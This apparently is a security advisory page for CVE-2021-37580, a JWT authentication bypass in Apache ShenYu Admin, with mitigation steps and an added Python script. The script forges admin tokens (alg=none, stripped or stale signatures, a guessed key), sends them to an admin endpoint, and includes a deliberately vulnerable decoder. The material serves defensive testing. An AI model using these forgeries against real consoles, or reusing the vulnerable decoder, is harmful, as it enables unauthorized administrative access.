Platform
java
Component
org.apache.shenyu:shenyu-admin
Fixed in
2.3.1
2.4.1
CVE-2021-37580 is a critical authentication bypass in Apache ShenYu Admin, the management console of the Apache ShenYu API gateway. Flawed JSON Web Token (JWT) handling in ShenyuAdminBootstrap lets an unauthenticated attacker bypass the admin authentication and reach all of the admin interfaces. The flaw affects ShenYu 2.3.0 and 2.4.0; the fix shipped in 2.4.1.
This vulnerability is significant because it defeats authentication entirely: an attacker who can craft a token the admin accepts impersonates a legitimate user and obtains full administrative access to the ShenYu Admin console. Because ShenYu Admin is the control plane that pushes selector, rule and plugin configuration to the gateway nodes, that access can be used to reroute or intercept API traffic passing through the gateway, alter security plugins, read sensitive configuration and disrupt every service behind the gateway. ShenYu Admin is frequently used to manage production API entry points, so successful exploitation can lead to widespread disruption and data breaches.
This vulnerability is considered highly exploitable because the bypass requires only a crafted token: no credentials, user interaction or prior access are needed. Public proof-of-concept exploits are likely to emerge, further increasing the risk. The vulnerability was publicly disclosed on November 17, 2021. No confirmed active exploitation campaigns have been publicly reported, but the critical severity and ease of exploitation warrant immediate attention. It is not currently listed on the CISA KEV catalog.
Organizations running Apache ShenYu Admin 2.3.0 or 2.4.0 to manage their gateways are at significant risk, especially where the admin console is reachable from untrusted networks or where access to it is not strictly controlled. Multi-tenant or shared environments in which several teams manage their routes through one ShenYu Admin instance are at increased risk, because a single bypass exposes every tenant's configuration.
• java / server:
# Check which shenyu-admin version is deployed. Spring Boot jars do not implement a
# -version flag, so read the manifest and the bundled shenyu module jars instead.
unzip -p shenyu-admin.jar META-INF/MANIFEST.MF
unzip -l shenyu-admin.jar | grep 'BOOT-INF/lib/shenyu-'
# Or, from the build, confirm the dependency version in the project tree
mvn dependency:tree -Dincludes=org.apache.shenyu:shenyu-admin
# Monitor ShenYu Admin logs for JWT verification failures. The exact message
# depends on the version's log format, so match broadly and then narrow down.
grep -iE 'jwt.*(fail|invalid|verif)' /path/to/shenyu-admin.log
EPSS
93.99% (100th percentile)
The primary mitigation is to upgrade to Apache ShenYu Admin 2.4.1 or later, which contains the fix. If an immediate upgrade is not possible, reduce exposure rather than relying on request filtering: a WAF rule cannot tell a forged JWT from a genuine one, and input validation on API parameters does nothing against an authentication bypass. Restrict network access to the admin console (bind it to an internal interface, firewall it, or put it behind a reverse proxy that enforces its own authentication) until the upgrade is done. Monitoring the ShenYu Admin logs for JWT verification failures can give early warning of probing. After upgrading, do not only confirm that a valid login still works; also send a request to an authenticated admin endpoint with a forged token (for example one whose signature has been stripped or altered) and confirm that the request is rejected.
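The script below is an added example, not code from this page or from the Apache ShenYu project. It builds the forged-token variants an attacker would try against a JWT-protected admin API, shows the decode-without-verify anti-pattern that such forgeries defeat (a generic illustration of the bypass class, not a claim about ShenYu's exact bug), and a hardened verifier that rejects every variant. The `probe` helper, the `/dashboardUser` path, the `X-Access-Token` header and the `userName` claim are assumptions for illustration; check them against your deployment before using the script as the post-upgrade check described above.

```python
"""Forged-JWT variants, the decode-without-verify anti-pattern they defeat, and a
hardened verifier that rejects every variant. Standard library only."""
import base64
import hashlib
import hmac
import json
import time
import urllib.error
import urllib.request
from typing import Dict, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_hs256(claims: dict, key: bytes) -> str:
    """Issue a correctly signed HS256 token, as a legitimate login endpoint would."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def forge_variants(legit_token: str, target_user: str = "admin") -> Dict[str, str]:
    """Tokens an attacker who does not hold the key can derive from a captured token.
    'userName' is an assumed claim name used for illustration."""
    header, payload, sig = legit_token.split(".")
    claims = json.loads(b64url_decode(payload))
    claims["userName"] = target_user
    tampered = b64url(json.dumps(claims, separators=(",", ":")).encode())
    none_header = b64url(b'{"alg":"none","typ":"JWT"}')
    return {
        "alg_none": f"{none_header}.{tampered}.",          # unsigned token
        "empty_signature": f"{header}.{tampered}.",        # HS256 header, no signature
        "stale_signature": f"{header}.{tampered}.{sig}",   # old signature on edited payload
        "guessed_key": mint_hs256(claims, b"secret"),      # signed with a guessed key
    }


def naive_decode(token: str) -> Optional[dict]:
    """Vulnerable pattern: trust the payload without checking the signature.
    Generic illustration of the bypass class, not Apache ShenYu's actual code."""
    try:
        return json.loads(b64url_decode(token.split(".")[1]))
    except (ValueError, IndexError):
        return None


def verify_hs256(token: str, key: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Hardened check: pinned algorithm, constant-time MAC compare, expiry enforced."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # refuses alg=none and algorithm confusion
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
    except ValueError:
        return None
    if not isinstance(claims, dict):
        return None
    if claims.get("exp", 0) <= (now if now is not None else time.time()):
        return None
    return claims


def probe(base_url: str, token: str, path: str = "/dashboardUser") -> int:
    """Post-upgrade check: send one token to an admin endpoint and return the HTTP status.
    Path and 'X-Access-Token' header are assumptions; adjust for your deployment."""
    req = urllib.request.Request(base_url.rstrip("/") + path, headers={"X-Access-Token": token})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


if __name__ == "__main__":
    key = b"example-key-not-a-real-secret"  # constructed for the demo
    legit = mint_hs256({"userName": "viewer", "exp": int(time.time()) + 3600}, key)
    for name, tok in forge_variants(legit).items():
        print(f"{name:16} naive accepts={naive_decode(tok) is not None}  "
              f"hardened accepts={verify_hs256(tok, key) is not None}")
```

Against a patched instance, every token returned by `forge_variants` should be rejected by `probe` (a non-200 status, or an error body if the deployment answers 200 with an error code in JSON), while a token obtained from a real login succeeds; the `naive_decode` column in the demo output shows why a verifier that skips the signature check accepts all four forgeries.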
Upgrade Apache ShenYu Admin to a version later than 2.4.0 that fixes the JWT authentication vulnerability. See the release notes for upgrade details.
CVE-2021-37580 is a critical vulnerability in Apache ShenYu Admin 2.3.0 and 2.4.0 that allows attackers to bypass authentication by exploiting improper JWT handling, granting unauthorized access to the admin interfaces.
If you are using Apache ShenYu Admin versions 2.3.0 or 2.4.0, you are affected by this vulnerability and should upgrade immediately.
Upgrade to Apache ShenYu Admin 2.4.1 or later to remediate the vulnerability. If an immediate upgrade is not possible, restrict network access to the admin console until it is done.
While no confirmed active exploitation campaigns have been publicly reported, the critical severity and ease of exploitation warrant immediate attention and proactive mitigation.
Refer to the Apache ShenYu security advisory for detailed information and updates: https://shenyu.apache.org/news/announcements/security/cve-2021-37580/